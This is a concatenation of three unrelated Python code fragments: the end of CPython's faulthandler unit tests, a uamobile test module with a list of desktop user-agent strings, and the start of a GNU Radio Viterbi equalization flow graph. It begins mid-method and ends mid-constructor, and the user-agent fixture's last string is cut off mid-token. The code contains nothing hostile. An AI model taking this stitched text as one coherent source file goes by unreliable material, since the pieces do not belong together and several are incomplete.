                # Restore the state the test found.
                if was_enabled:
                    faulthandler.enable()
                else:
                    faulthandler.disable()
        finally:
            sys.stderr = orig_stderr

    def test_disabled_by_default(self):
        # By default, the module should be disabled
        code = "import faulthandler; print(faulthandler.is_enabled())"
        args = (sys.executable, '-c', code)
        # don't use assert_python_ok() because it always enable faulthandler
        process = subprocess.Popen(args, stdout=subprocess.PIPE)
        output, _ = process.communicate()
        exitcode = process.wait()
        self.assertEqual(output.rstrip(), b"False")
        self.assertEqual(exitcode, 0)

    def check_dump_traceback(self, filename):
        """
        Explicitly call dump_traceback() function and check its output.
        Raise an error if the output doesn't match the expected format.
        """
        # Blank lines are significant: lineno 7/9, funcA at 12, call at 14.
        code = """
            from __future__ import with_statement
            import faulthandler

            def funcB():
                if {has_filename}:
                    with open({filename}, "wb") as fp:
                        faulthandler.dump_traceback(fp, all_threads=False)
                else:
                    faulthandler.dump_traceback(all_threads=False)

            def funcA():
                funcB()

            funcA()
            """
        code = code.format(
            filename=repr(filename),
            has_filename=bool(filename),
        )
        if filename:
            lineno = 7
        else:
            lineno = 9
        expected = [
            'Stack (most recent call first):',
            '  File "<string>", line %s in funcB' % lineno,
            '  File "<string>", line 12 in funcA',
            '  File "<string>", line 14 in <module>'
        ]
        trace, exitcode = self.get_output(code, filename)
        self.assertEqual(trace, expected)
        self.assertEqual(exitcode, 0)

    def test_dump_traceback(self):
        self.check_dump_traceback(None)

    def test_dump_traceback_file(self):
        with temporary_filename() as filename:
            self.check_dump_traceback(filename)

    def test_truncate(self):
        # Function names longer than the internal limit are truncated with
        # an ellipsis in the dumped traceback.
        maxlen = 500
        func_name = 'x' * (maxlen + 50)
        truncated = 'x' * maxlen + '...'
        code = """
            import faulthandler

            def {func_name}():
                faulthandler.dump_traceback(all_threads=False)

            {func_name}()
            """
        code = code.format(
            func_name=func_name,
        )
        expected = [
            'Stack (most recent call first):',
            '  File "<string>", line 4 in %s' % truncated,
            '  File "<string>", line 6 in <module>'
        ]
        trace, exitcode = self.get_output(code)
        self.assertEqual(trace, expected)
        self.assertEqual(exitcode, 0)

    # 'linux2' was the Python 2 value of sys.platform; Python 3 reports
    # 'linux', so match both with startswith().
    @skipIf(not sys.platform.startswith('linux'),
            'thread name printing is only supported on Linux')
    def test_thread_name_when_set(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            import ctypes
            libc = ctypes.cdll.LoadLibrary("libc.so.6")
            buf = ctypes.create_string_buffer("some_name")
            # PR_SET_NAME
            libc.prctl(15, buf)
            faulthandler._sigsegv()
            """,
            8,
            'Segmentation fault',
            thread_name="some_name"
            )

    @skipIf(not sys.platform.startswith('linux'),
            'thread name printing is only supported on Linux')
    def test_thread_name_when_empty(self):
        " Will not print the <thread_name> if no name is set "
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            import ctypes
            libc = ctypes.cdll.LoadLibrary("libc.so.6")
            buf = ctypes.create_string_buffer("")
            # PR_SET_NAME
            libc.prctl(15, buf)
            faulthandler._sigsegv()
            """,
            8,
            'Segmentation fault',
            thread_name=None
            )

    @skipIf(not HAVE_THREADS, 'need threads')
    def check_dump_traceback_threads(self, filename):
        """
        Call explicitly dump_traceback(all_threads=True) and check the output.
        Raise an error if the output doesn't match the expected format.
        """
        # '{filename}' restored where the template had been corrupted to
        # '(unknown)'; repr(None) is 'None', which is falsy in the child.
        # Blank lines are significant: run() waits at 24, dump() called at 29.
        code = """
            from __future__ import with_statement
            import faulthandler
            from threading import Thread, Event
            import time

            def dump():
                if {filename}:
                    with open({filename}, "wb") as fp:
                        faulthandler.dump_traceback(fp, all_threads=True)
                else:
                    faulthandler.dump_traceback(all_threads=True)

            class Waiter(Thread):
                # avoid blocking if the main thread raises an exception.
                daemon = True

                def __init__(self):
                    Thread.__init__(self)
                    self.running = Event()
                    self.stop = Event()

                def run(self):
                    self.running.set()
                    self.stop.wait()

            waiter = Waiter()
            waiter.start()
            waiter.running.wait()
            dump()
            waiter.stop.set()
            waiter.join()
            """
        code = code.format(filename=repr(filename))
        output, exitcode = self.get_output(code, filename)
        output = '\n'.join(output)
        if filename:
            lineno = 9
        else:
            lineno = 11
        regex = r"""
            ^Thread 0x[0-9a-f]+ (\<[\w\.]{{1,16}}\>\s)?\(most recent call first\):
            (?:  File ".*threading.py", line [0-9]+ in [_a-z]+
            ){{1,3}}  File "<string>", line 24 in run
              File ".*threading.py", line [0-9]+ in _?_bootstrap_inner
              File ".*threading.py", line [0-9]+ in _?_bootstrap
            Current thread XXX (\<[\w\.]{{1,16}}\>\s)?\(most recent call first\):
              File "<string>", line {lineno} in dump
              File "<string>", line 29 in <module>$
            """
        regex = dedent(regex.format(lineno=lineno)).strip()
        self.assertRegex(output, regex)
        self.assertEqual(exitcode, 0)

    def test_dump_traceback_threads(self):
        self.check_dump_traceback_threads(None)

    def test_dump_traceback_threads_file(self):
        with temporary_filename() as filename:
            self.check_dump_traceback_threads(filename)

    def _check_dump_traceback_later(self, repeat, cancel, filename, loops):
        """
        Check how many times the traceback is written in timeout x 2.5 seconds,
        or timeout x 3.5 seconds if cancel is True: 1, 2 or 3 times depending
        on repeat and cancel options.

        Raise an error if the output doesn't match the expect format.
        """
        timeout_str = str(datetime.timedelta(seconds=TIMEOUT))
        # Blank lines are significant: sleep at 12, func() called at 23
        # (see expected_traceback(12, 23, ...) below).
        code = """
            import faulthandler
            import time

            def func(timeout, repeat, cancel, file, loops):
                for loop in range(loops):
                    faulthandler.dump_traceback_later(timeout, repeat=repeat, file=file)
                    if cancel:
                        faulthandler.cancel_dump_traceback_later()
                    # sleep twice because time.sleep() is interrupted by
                    # signals and dump_traceback_later() uses SIGALRM
                    for loop in range(2):
                        time.sleep(timeout * 1.25)
                    faulthandler.cancel_dump_traceback_later()

            timeout = {timeout}
            repeat = {repeat}
            cancel = {cancel}
            loops = {loops}
            if {has_filename}:
                file = open({filename}, "wb")
            else:
                file = None
            func(timeout, repeat, cancel, file, loops)
            if file is not None:
                file.close()
            """
        code = code.format(
            timeout=TIMEOUT,
            repeat=repeat,
            cancel=cancel,
            loops=loops,
            has_filename=bool(filename),
            filename=repr(filename),
        )
        trace, exitcode = self.get_output(code, filename)
        trace = '\n'.join(trace)

        if not cancel:
            count = loops
            if repeat:
                count *= 2
            header = r'Timeout \(%s\)!\nCurrent thread XXX (\<[\w\.]{1,16}\>\s)?\(most recent call first\):\n' % timeout_str
            regex = expected_traceback(12, 23, header, min_count=count)
            self.assertRegex(trace, regex)
        else:
            self.assertEqual(trace, '')
        self.assertEqual(exitcode, 0)

    @skipIf(not hasattr(faulthandler, 'dump_traceback_later'),
            'need faulthandler.dump_traceback_later()')
    def check_dump_traceback_later(self, repeat=False, cancel=False,
                                   file=False, twice=False):
        if twice:
            loops = 2
        else:
            loops = 1
        if file:
            with temporary_filename() as filename:
                self._check_dump_traceback_later(repeat, cancel,
                                                 filename, loops)
        else:
            self._check_dump_traceback_later(repeat, cancel, None, loops)

    def test_dump_traceback_later(self):
        self.check_dump_traceback_later()

    def test_dump_traceback_later_repeat(self):
        self.check_dump_traceback_later(repeat=True)

    def test_dump_traceback_later_cancel(self):
        self.check_dump_traceback_later(cancel=True)

    def test_dump_traceback_later_file(self):
        self.check_dump_traceback_later(file=True)

    def test_dump_traceback_later_twice(self):
        self.check_dump_traceback_later(twice=True)

    @skipIf(not hasattr(faulthandler, "register"),
            "need faulthandler.register")
    def check_register(self, filename=False, all_threads=False,
                       unregister=False, chain=False):
        """
        Register a handler displaying the traceback on a user signal. Raise the
        signal and check the written traceback.

        If chain is True, check that the previous signal handler is called.

        Raise an error if the output doesn't match the expected format.
        """
        signum = signal.SIGUSR1
        # Blank lines are significant: os.kill at 7, func() called at 28
        # (see expected_traceback(7, 28, ...) below).
        code = """
            import faulthandler
            import os
            import signal
            import sys

            def func(signum):
                os.kill(os.getpid(), signum)

            def handler(signum, frame):
                handler.called = True
            handler.called = False

            exitcode = 0
            signum = {signum}
            unregister = {unregister}
            chain = {chain}

            if {has_filename}:
                file = open({filename}, "wb")
            else:
                file = None
            if chain:
                signal.signal(signum, handler)
            faulthandler.register(signum, file=file,
                                  all_threads={all_threads}, chain={chain})
            if unregister:
                faulthandler.unregister(signum)
            func(signum)
            if chain and not handler.called:
                if file is not None:
                    output = file
                else:
                    output = sys.stderr
                output.write("Error: signal handler not called!\\n")
                exitcode = 1

            if file is not None:
                file.close()

            sys.exit(exitcode)
            """
        code = code.format(
            filename=repr(filename),
            has_filename=bool(filename),
            all_threads=all_threads,
            signum=signum,
            unregister=unregister,
            chain=chain,
        )
        trace, exitcode = self.get_output(code, filename)
        trace = '\n'.join(trace)
        if not unregister:
            if all_threads:
                regex = r'Current thread XXX (\<[\w\.]{1,16}\>\s)?\(most recent call first\):\n'
            else:
                regex = r'Stack \(most recent call first\):\n'
            regex = expected_traceback(7, 28, regex)
            self.assertRegex(trace, regex)
        else:
            self.assertEqual(trace, '')
        if unregister:
            self.assertNotEqual(exitcode, 0)
        else:
            self.assertEqual(exitcode, 0)

    def test_register(self):
        self.check_register()

    def test_unregister(self):
        self.check_register(unregister=True)

    def test_register_file(self):
        with temporary_filename() as filename:
            self.check_register(filename=filename)

    def test_register_threads(self):
        self.check_register(all_threads=True)

    def test_register_chain(self):
        self.check_register(chain=True)

    @contextmanager
    def check_stderr_none(self):
        # Temporarily set sys.stderr to None and assert that the wrapped
        # faulthandler call raises ValueError("sys.stderr is None").
        stderr = sys.stderr
        try:
            sys.stderr = None
            err = '<no exception raised>'
            try:
                yield
            except Exception as exc:
                err = exc
            self.assertEqual(str(err), "sys.stderr is None")
        finally:
            sys.stderr = stderr

    def test_stderr_None(self):
        # Issue #21497: provide an helpful error if sys.stderr is None,
        # instead of just an attribute error: "None has no attribute fileno".
        with self.check_stderr_none():
            faulthandler.enable()
        with self.check_stderr_none():
            faulthandler.dump_traceback()
        if hasattr(faulthandler, 'dump_traceback_later'):
            with self.check_stderr_none():
                faulthandler.dump_traceback_later(1)
        if hasattr(faulthandler, "register"):
            with self.check_stderr_none():
                faulthandler.register(signal.SIGUSR1)

    if not hasattr(unittest.TestCase, 'assertRegex'):
        # Copy/paste from Python 3.3: just replace (str, bytes) by str
        def assertRegex(self, text, expected_regex, msg=None):
            """Fail the test unless the text matches the regular expression."""
            if isinstance(expected_regex, str):
                assert expected_regex, "expected_regex must not be empty."
                expected_regex = re.compile(expected_regex)
            if not expected_regex.search(text):
                msg = msg or "Regex didn't match"
                msg = '%s: %r not found in %r' % (msg, expected_regex.pattern, text)
                raise self.failureException(msg)
if __name__ == "__main__":
    # Run the FaultHandlerTests suite when executed directly.
    unittest.main()
|
# -*- coding: utf-8 -*-
from tests import msg
from uamobile import *
from uamobile.nonmobile import NonMobileUserAgent as NonMobile
def test_detect_fast():
    # A desktop Firefox user agent must be classified as 'nonmobile'.
    assert detect_fast('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1') == 'nonmobile'
def test_empty_useragent():
    """detect() must not propagate an error when HTTP_USER_AGENT is absent
    from the environ dict."""
    try:
        detect({})
    except Exception:
        # Narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt are
        # no longer swallowed and reported as a test failure.
        assert False, 'KeyError HTTP_USER_AGENT should be ignored silently'
def test_useragent_nonmobile():
    # Nose-style generator test: yields one check per user agent in DATA.
    def inner(useragent):
        ua = detect({'HTTP_USER_AGENT': useragent})
        # Every DATA entry must be detected as a NonMobile agent with the
        # expected carrier attributes and no carrier-specific behaviour.
        assert isinstance(ua, NonMobile)
        assert ua.carrier == 'NonMobile'
        assert ua.short_carrier == 'N'
        assert ua.is_docomo() == False
        assert ua.is_ezweb() == False
        assert ua.is_softbank() == False
        assert ua.is_vodafone() == False
        assert ua.is_jphone() == False
        assert ua.is_willcom() == False
        assert ua.is_nonmobile()
        assert ua.display is not None
        assert ua.supports_cookie() == True
        assert ua.serialnumber is None
    for ua in DATA:
        yield inner, ua
def test_display_default():
    # A non-mobile agent must still expose sensible default display info.
    ua = detect({'HTTP_USER_AGENT': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4'})
    assert ua.display.width != 0
    assert ua.display.height != 0
    assert ua.display.color
    assert ua.display.depth
    # Default display reports QVGA, not VGA; presumably the library's
    # fallback resolution -- verify against uamobile's display defaults.
    assert ua.display.is_vga() is False
    assert ua.display.is_qvga() is True
def test_strip_serialnumber():
    """strip_serialnumber() is the identity for a UA with no serial number."""
    raw = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4'
    assert detect({'HTTP_USER_AGENT': raw}).strip_serialnumber() == raw
#########################
# Test data
#########################
# User-Agent strings that must all be classified as non-mobile.
# NOTE(review): the final entry ('... T312461; Hewle') looks truncated
# mid-token -- confirm against the upstream fixture.
DATA = ('Mozilla/2.0 (compatible; Ask Jeeves)',
        'Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)',
        'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE)',
        'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)',
        'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320; PPC)',
        'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; PPC; 240x320)',
        'Mozilla/2.0 (compatible; T-H-U-N-D-E-R-S-T-O-N-E)',
        'Mozilla/3.0 (DreamPassport/3.0)',
        'Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)',
        'Mozilla/3.0 (DreamPassport/3.2)',
        'Mozilla/3.0 (Slurp.so/Goo; <EMAIL>; http://www.inktomi.com/slurp.html)',
        'Mozilla/3.0 (Slurp/si; <EMAIL>; http://www.inktomi.com/slurp.html)',
        'Mozilla/3.0 (Win95; I)',
        'Mozilla/3.0 (Windows 2000; U) Opera 6.05 [ja]',
        'Mozilla/3.0 (aruyo/0.01;http://www.aaacafe.ne.jp/ ;<EMAIL>)',
        'Mozilla/3.0 (compatible)',
        'Mozilla/3.0 (compatible; Indy Library)',
        'Mozilla/3.0 (compatible; NetMind-Minder/4.3.1J)',
        'Mozilla/3.0 (compatible; NetPositive/2.2.1; BeOS)',
        'Mozilla/3.0 (compatible; PerMan Surfer 3.0; Win95)',
        'Mozilla/3.0 (compatible;)',
        'Mozilla/3.01 (compatible;)',
        'Mozilla/3.01 [ja] (Macintosh; I; 68K)',
        'Mozilla/3.01Gold (Macintosh; I; 68K)',
        'Mozilla/3.01Gold (Macintosh; I; 68K; SiteCoach 1.0)',
        'Mozilla/4.0',
        'Mozilla/4.0 (LINKS ARoMATIZED)',
        'Mozilla/4.0 (PDA; SL-A300/1.0,Embedix/Qtopia/1.1.0) NetFront/3.0',
        'Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0',
        'Mozilla/4.0 (Windows NT 4.0)',
        'Mozilla/4.0 (compatible',
        'Mozilla/4.0 (compatible; MSIE 4.01; MSN 2.5; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT Windows CE)',
        'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)',
        'Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 4.5; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.5; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; HKBN)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; MSIECrawler)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; MSOCD; AtHomeJP0109)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; Q312461)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; YComp 5.0.2.4)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; istb 641)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) LinkChecker 0.1',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) WebWasher 3.2',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; NetCaptor 7.0.1)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; istb 641)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; Lunascape 0.99c)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; Norfolk Southern Corp.)',
        'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; nk-07102k)',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 7.0; Windows 98; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.2.18-0vl4.2 i686) Opera 6.0 [en]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC; AtHomeJP191)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC;)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Win32)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.05 [en]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.05 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 5.12 [es]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.03 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.05 [en]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.05 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)::ELNSB50::0000211003200258031a018f000000000505000b00000000',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.0.0)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; Hotbar 3.0)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 6.03 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 6.05 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.0 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.01 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.03 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.05 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.01 [de]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.03 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.04 [en]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.04 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [ja]',
        'Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.14; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.21; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC) OmniWeb/4.1.1-v424.6',
        'Mozilla/4.0 (compatible; MSIE 5.5; AOL 6.0; Windows 98; Win 9x 4.90)',
        'Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; AOL 7.0; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; YComp 5.0.0.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; ie5.5cd_t-zone_0005)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSIECrawler)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSN 6.1; MSNbMSFT; MSNmja-jp; MSNc00)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSOCD; AtHomeJP191)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Q312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Q312461; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; istb 641)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; istb 641; COM+ 1.0.2204)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Lunascape 0.98d)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; MSOCD; AtHomeJP0109)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Q312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Q312461; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; T312461; Lunascape 0.99c)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Unithink)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; telus.net_v5.0.1; Hotbar 4.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; telus.net_v5.0.1)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; H010818)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; H010818; CPT-IE401SP1; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; SenseWave 1.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; Suncorp Metway Ltd)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; T312461; Lunascape 0.95a)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; Yahoo! JAPAN Version Windows 95/NT CD-ROM Edition 1.0.)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.1))',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.1); (R1 1.3))',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; (R1 1.3))',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; AIRF)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DigExt)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; FORJEIS55SP1)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; H010818)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Hotbar 3.0; istb 641)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Hotbar 4.1.7.0)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Lunascape 0.98c)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; N_o_k_i_a)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Q312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Q312461; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; Hewle'
        )
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Viterbi Equalization
# Generated: Sun Aug 4 08:48:02 2019
##################################################
if __name__ == '__main__':
    import ctypes
    import sys
    if sys.platform.startswith('linux'):
        try:
            # Initialise X11 for multi-threaded use before Qt starts up;
            # standard boilerplate emitted by the GRC code generator.
            x11 = ctypes.cdll.LoadLibrary('libX11.so')
            x11.XInitThreads()
        except:
            # Best-effort only: the flow graph can still run without it.
            # (Python 2 print statement -- this generated file targets py2.)
            print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from gnuradio import analog
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio import trellis, digital
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from gnuradio.qtgui import Range, RangeWidget
from grc_gnuradio import blks2 as grc_blks2
from optparse import OptionParser
import gnuradio.trellis.fsm_utils as fu
import math
import numpy
import sip
import sys
class viterbi_equalization(gr.top_block, Qt.QWidget):
    """GRC-generated flow graph: Viterbi equalization of a PAM-4 signal over
    an ISI channel, with a Qt GUI showing the measured BER.

    Signal path: random bits -> throttle -> pack -> PAM-4 symbols ->
    channel FIR -> + Gaussian noise -> trellis Viterbi decoder -> unpack,
    compared against the source bits by a BER block feeding a number sink.
    """
    def __init__(self):
        gr.top_block.__init__(self, "Viterbi Equalization")
        Qt.QWidget.__init__(self)
        self.setWindowTitle("Viterbi Equalization")
        try:
            self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
        except:
            # Icon is cosmetic; ignore themes that lack it.
            pass
        # Standard GRC scroll-area scaffolding around the widget layout.
        self.top_scroll_layout = Qt.QVBoxLayout()
        self.setLayout(self.top_scroll_layout)
        self.top_scroll = Qt.QScrollArea()
        self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
        self.top_scroll_layout.addWidget(self.top_scroll)
        self.top_scroll.setWidgetResizable(True)
        self.top_widget = Qt.QWidget()
        self.top_scroll.setWidget(self.top_widget)
        self.top_layout = Qt.QVBoxLayout(self.top_widget)
        self.top_grid_layout = Qt.QGridLayout()
        self.top_layout.addLayout(self.top_grid_layout)
        # Persist/restore the window geometry between runs.
        self.settings = Qt.QSettings("GNU Radio", "viterbi_equalization")
        self.restoreGeometry(self.settings.value("geometry").toByteArray())
        ##################################################
        # Variables
        ##################################################
        self.modulation = modulation = fu.pam4
        self.channel = channel = fu.c_channel
        # Combined modulation+channel lookup table for the trellis decoder.
        self.tot_mod = tot_mod = fu.make_isi_lookup(modulation,channel,False)
        self.fsm = fsm = trellis.fsm(len(modulation[1]),len(channel))
        # Bits per symbol, derived from the FSM input alphabet size.
